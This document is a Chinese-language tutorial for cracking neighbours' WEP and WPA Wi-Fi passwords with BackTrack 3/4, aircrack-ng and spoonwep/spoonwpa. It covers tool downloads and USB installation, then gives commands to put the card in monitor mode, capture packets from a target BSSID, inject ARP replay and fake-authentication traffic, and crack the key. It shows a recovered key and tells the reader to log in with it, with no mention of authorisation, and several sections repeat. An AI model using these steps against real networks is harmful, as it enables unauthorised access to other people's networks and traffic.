bt3-bt4无线网络破解教程.doc

bt4破解教程一、准备篇 1、一个有可破解无线信号的环境。如我在家随便搜索出来的信号。2、带无线网卡的电脑一台（笔记本台式机均可，只要无线网卡兼容BT3），我用 的是三星NC10的上网本。3、2G以上优盘一个（我用的是kingston 8G 的）4、搜索 下载BT3，约800兆。或BT4，约900兆。BT3下载地址： /BACKTRACK3final_usb.rarBT4 下载地址： http:/ftp.belnet.be/mirror/backtrack/bt4-beta.iso注：BT3 全称BackTrack3，与我们常说的bt下载是完全不同的概念。以我理解就是集成了一些计算机安全软件的linux系统。正是由于它的出世和不断普 及，使得破解可让普通用户轻易言之。5、搜索下载spoonwep2中文包。地址： :8080/servlet/FileDownload?filename=/yinghu/上 传分享/2008/11/13/中文包_spoonwep2.rar&vid=0注：spoonwep2就是我们的破 解软件，一个非常强悍的图形化破解WEP无线网络密码的工具。二、安装篇1、将优盘格式化，配置如下图，唯一要注意文件系统选为FAT32就可以了。2、将刚才下载完成的bt3解压缩，复制到优盘，完成后会看到优盘目录下有两个文件夹，一个boot 一个BT3。如下图：3、开始安装bt3系统。点击开始-运行，输入 CMD, 然后回车，进入命令行模式 。首先输入你优盘的盘符，我这里是h盘，输入h： 然后回车，接下来输入 cd boot 回车，进入到boot文件夹下，最后 bootinst.bat 回车，就会开始安装BT3，如下图：然后安装会出现一个提示画面，我们别去管它，直接按任意键继续按任意键后，电脑会自动设置引导记录，整个过程大概10秒左右。出现下面画面 后，此优盘就可以引导系统进去bt3了。4、集成 spoonwep2软件。首先把我们先前下载的spoonwep2解压缩，里面是六个扩展名为lzm的文件，将这六个文件复制 到优盘bt3modules文件夹下，如图：这样我们的 bt3系统已经集成安装完毕了，可以动手破解了。三 破解篇1、将安装好系统的优盘插入电脑，重启后进入bios，设置优盘为电脑第一启动顺序。（这个如果没设置过，可以问一下其他人，或者在网上找找设置方法，每 台电脑进入bios的方法也不同，如开机按F2，Del，F1等等）2、设置优盘启动后，电脑会自动带入我们进入bt3操作系 统（如果出现界面选择，你要选择vesa mode），系统界面是这样的（漂亮吧）：开始输入指令 ifconfig -a 查看网卡（之后只出现eth0和lo则表示你的无线网卡没有被识别，要是有eth0、wlan、lo等则表示可以） 如果出现wlan网卡（本机无线网卡），则进行 ifconfig -a wlan0 up（此命令用于加载网卡，有的时候直接执行spoonwep是不可以的，需要加载） 然后执行ln -fs bash/bin/sh 再执行 ls -all /bin/sh（显示bash为成功，显示dash为失败）现在开始破解1.在shell窗口中输入 ifconfig 命令 ，出现如下信息：lo no wireless extensions.eth0 no wireless extensions.eth1 IEEE 802.11g ESSID: Nickname:Mode:（.）Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-95 dBm Noise level=-95 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:02.找出你的无线网卡名字，我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ，返回如下信息：lo no wireless extensions.eth0 no wireless extensions.eth1 IEEE 802.11g ESSID: Nickname:Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82 Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:offEncryption key:offPower Management:offLink Quality=0/94 Signal level=-95 dBm Noise level=-95 dBmRx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0Tx excessive retries:0 Invalid misc:0 Missed beacon:03. 输入命令 airodump-ng -c 11 -bssid 00:1A:01:8D:C3:B2 -w outputs eth1.命令中的11 表示要破解的频道号，bssid后面的数字表示破解目标的MAC物理地址，outputs表示要生成的包的名称。回车运行。4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址，00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1获取更多的数据包。6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功，让它继续抓包，直到破解。3、启动spoonwep2软件开启一个命令窗口，输入：spoonwep 回车后10秒钟左右弹出spoonwep2程序：NET CARD 网卡接口 选择 WLAN0DRIVER 驱动 选择 NORMALMODE 模式 选择 UNKNOWN VICTIM点 NEXT 转到 VICTIMS DISCOVERY 窗口CHAN HOPPING 是全频段扫描 （建议选择： FIXED CHAN，有针对性的扫描）点击右上角 LAUNCH 按钮 (点完后会变成 ABORT ) 这时会弹出抓包窗口，可作为参考，也可不用理会。20秒首先点击左上角下拉菜单选择CHAN HOPPINGLAUNCH(点完后会变成ABORT )会开始自动执行注：ESSID 路由广播名称MAC 路由的地址CHAN 使用的频道POW 信号强度DATA 数据包CLIS 空白代表无客户端，打钩则代表有客户端；（备注：无线网卡搜索一阵子，被搜索到的无线信号的SSID将会列表显示。如果某加密无线信号的CLIS方框内有“勾”，表示该无线信号此刻托有客户端，这时破解会高效、快速一些。如果你选中了这样的的信号，紧接着窗口的下方会显示出客户端代表，你应该把下方的客户端也选中1想参与破解。不要迷信一定要带客户端才能破解，没有客户端的AP也可以破解，里路上POW值大于18的都可以破解的。）有客户端模式比无客户端模式成功率要高，选中打算破解的路由，下面会显示出当前所有链接到这个路由的客户端，选择一个POWER PACKETS都比较高的客户端。然后点 SELECTION OK 转到 ATTACK PANEL 窗口第一个下拉菜单有4个选项，后面3个都可作为无客户端攻击模式，其中 ：ARP REPLAY ATTACK （有客户端时用）P0841 REPLAY ATTACK (次次选）CHOPCHOP & FORGEATTACK （次选）FRAGMENTATION & FORGE ATTACK （首选）第二个下拉菜单有3个选项，其中：? LENGTH (不指定加密位数，首选）128 BITS LENGTH （指定128位加密，次次选）64 BITS LENGTH （指定64位加密，次选）两个下拉菜单右边的 Inj Rate 是每秒发包数量，选默认的600即可。选择好两个下拉菜单，点击左边 LAUNCH 按钮 开始自动破解，破解速度和信号强度成正比。最下面的WEP KEY就是破解出来的密码，无需输入冒号。注：有客户端模式比无客户端成功率要高。注：破解WPA加密时，输入命令为spoonwpa，其他操作步骤不变（但一定需要有客户端连接才能破解）BT4破解教程一、spoonwep- wpa破解工具用于BT4下的deb安装包迅雷下载地址：(已经修正下载地址， 打开迅雷， 然后复制以下地址即 可)thunder:/QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa二、 运行unetbootin制作BT4的U盘启动系统。点确定就开始制作了。在这里需要泡杯茶点支烟等一下。从ISO文件 里提取文件拷贝到U盘里需要一段时间。完成之后，不要重启， 再把刚刚下到的“spoonwep-wpa破解工具用于BT4下的deb安装包”手动拷贝到U盘根目录下面， 自己记好它好的名字， 方便到BT4下找到它。三、启动BT4在BIOS里面设置从U盘启动， 这个无法截图， 自己摸索吧。呵呵四、 进入BT4登陆的用户名：root，密码：toorstartx命令启动图形化界面。五、安装 spoonwep-wpa-rc3.deb包点击左下角的开始菜单，点击一个叫system mune的弹出菜单，再点击“storeage media”，会打开一个窗口，点击窗口上面有个刷新的按钮，在窗口下面空白的地方会列出你的硬盘和外设，进入U盘，找到刚才放入的spoonwep- wpa-rc3.deb，把这个文件复制到BT4的桌面（其实就是/root），可以直接拖到桌面，打开命令行窗口运行“dpkg -i spoonwep-wpa-rc3.deb” 稍等几秒中，桌面上出现desktop的文件夹，里面就有了 spoonwep2+spoonwpa，好了，大功告成，直接单击图标就能运行spoonwep2或spoonwpa了。也可以输入以下 命令执行:spoonwep2 执行:spoonwep2spoonwpa 执行:spoonwpa六、 开始破解！1、打开一个SHELL， 输入ifconfig -a2、可以输入macchange -m 00:11:22:33:44:55 wlan0 来改变本机的MAC地址，3、输入airmon-ng start wlan0 64、输入aireplay-ng -9 mon05、加载网卡输入ifconfig -a wlan0 up6、输入ln -fs bash/bin/sh7、输入ls -al /bin/sh(这个命令可以显示是否设置成功，显示bash为成功， dash为失败)【spoonwep2 破解法】输入spoonwep2回车后就会弹出spoonwep2的窗口。点击SPOONWEP SETTINGS,在NET CARD里选WLAN0，在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索，然后关闭spoonwep2再开一下，点击SPOONWEP SETTINGS,在NET CARD里选MON0，在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦，选定1个网卡点击SELECTION OK,选定PO841 REPLAY ATTACK(这里有4条命令选择)，点击LAUNCH后就等待密码的出来(sata数据包到30000个左右)。【spoonwpa 破解法】输入spoonwpa回车后就会弹出spoonwpa的窗口。在NET CARD里选WLAN0，在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索，然后关闭spoonwpa再开一下，点击SPOONWEP SETTINGS,在NET CARD里选MON0，在DRIVER里选NORMAL,在MODE里选UNKNOWN VICTIM,再点击NEXT、点击LAUNCH进入搜索后就可以看见好多网卡啦，选定1个必须有客户端的网卡点击SELECTION OK, 再点击LAUNCH AUTOMATED HANDSHAKE CAPTURE，如抓到握手包，请点击金色锁开始破解，这完全靠运气了。七、 用你破解出来的密码去登陆吧/blogger/post_show.asp?BlogID=2446622&PostID=20778253从硬盘启动BT3和BT4破解教程/s/blog_5ee22a410100fjo8.htmlBT4中文版(集成spoonwep2/spoonwpa)下载地址/zh-cn/files/bff1b980-66e6-11de-a445-0019d11a795f//zh-cn/files/82ef1823-66d3-11de-a60d-0019d11a795f//zh-cn/files/69667f23-66b9-11de-94dd-0014221b798a/全功能版本的BT3(dvd版 集成各种驱动 spoonwep/zh-cn/files/cf44a345-2755-11de-a577-0019d11a795f/BackTrack4 (BT4)最终版 (2010年1月11日版/s/blog_568be75b0100gu3h.html?k=bt4&t=utf-83 完成以上的步骤后就开始破解啦启动建好的虚拟机，加载BT3,注意如果找不到卡王的话，就“虚拟机-可移动设备-USB设备-Realtak可移动设备”接着就是正式破解了，打开一个shell输入命令有2种(2选一)(1) Airodump-ng w 1 wlan0(2)airodump-ng -ivs -w 123 -c 6 wlan0回车，开始抓包,出现下图这样的是抓包成功小强解释抓包的数据:a.BSSID 下面所对应的是你要攻击破解的路由AP的MAC地址。（要拿笔纸抄下）b.PWR 值 PWR值代表信号强度。值越高越好。一般高于30就可以很容易的破解。此处优先选择值高者破解c.DATA 数据包。 下面所对应的AP（路由）如果有数值（不为0）就说明有客户端。有客户端者优先破解。为0者先放弃。当然如果在破解时，此值为0.也可以破解。只是时间会长点。且成功率降低。d.ESSID 此务必记住 ，此为AP（路由的名字）e.以上请一一对应记好f.请务必选择 cipher下为wep的破解。如是wap或非wep者则放弃非wep者目前仍未有好的方法破解。很明显，你要破的是哪一个吧？用第一个来做示范!00：14：78：8B：F3:44打开第二个shell,输入命令 spoonwep回车后会自动出现一个新窗口在第一行中输入你选择的那个BSSID(刚刚小强叫抄的哦)NET CARD 选择WLANOInj rate 可以移动到1000LAUNCH 选择PO841这个接着点击LAUNCH，就等着密码出来吧这个比较快，大概就三分钟的样子 WEP KEY:6471686474(密码就是红色那个去掉2个数字之间的冒号)最佳答案一、既然有系统了，1.一个U盘启动制作工具就行：unetbootin-windows-356下载地址：/blog/attachments/month_0906/t2009621225526.rar2.spoonwep-wpa破解工具用于BT4下的deb安装包迅雷下载地址：(已经修正下载地址， 打开迅雷， 然后复制以下地址即可)thunder:/QUFodHRwOi8vbXkueHd0b3AuY29tL2ZpbGVteS8yMDA5MDUxNy82NzljMTNkMi4xLmRlYlpa二、运行unetbootin制作BT4的U盘启动系统。点确定就开始制作了。在这里需要泡杯茶点支烟等一下。从ISO文件里提取文件拷贝到U盘里需要一段时间。完成之后，不要重启， 再把刚刚下到的“spoonwep-wpa破解工具用于BT4下的deb安装包”手动拷贝到U盘根目录下面， 自己记好它好的名字， 方便到BT4下找到它。三、启动BT4在BIOS里面设置从U盘启动， 这个无法截图， 自己摸索吧。呵呵四、进入BT4登陆的用户名：root，密码：toorstartx命令启动图形化界面。五、安装spoonwep-wpa-rc3.deb包点击左下角的开始菜单，点击一个叫system mune的弹出菜单，再点击“storeage media”，会打开一个窗口，点击窗口上面有个刷新的按钮，在窗口下面空白的地方会列出你的硬盘和外设，进入U盘，找到刚才放入的spoonwep-wpa-rc3.deb，把这个文件复制到BT4的桌面（其实就是/root），可以直接拖到桌面，打开命令行窗口运行“dpkg -i spoonwep-wpa-rc3.deb” 稍等几秒中，桌面上出现desktop的文件夹，里面就有了spoonwep2+spoonwpa，好了，大功告成，直接单击图标就能运行spoonwep2或spoonwpa了。也可以输入以下命令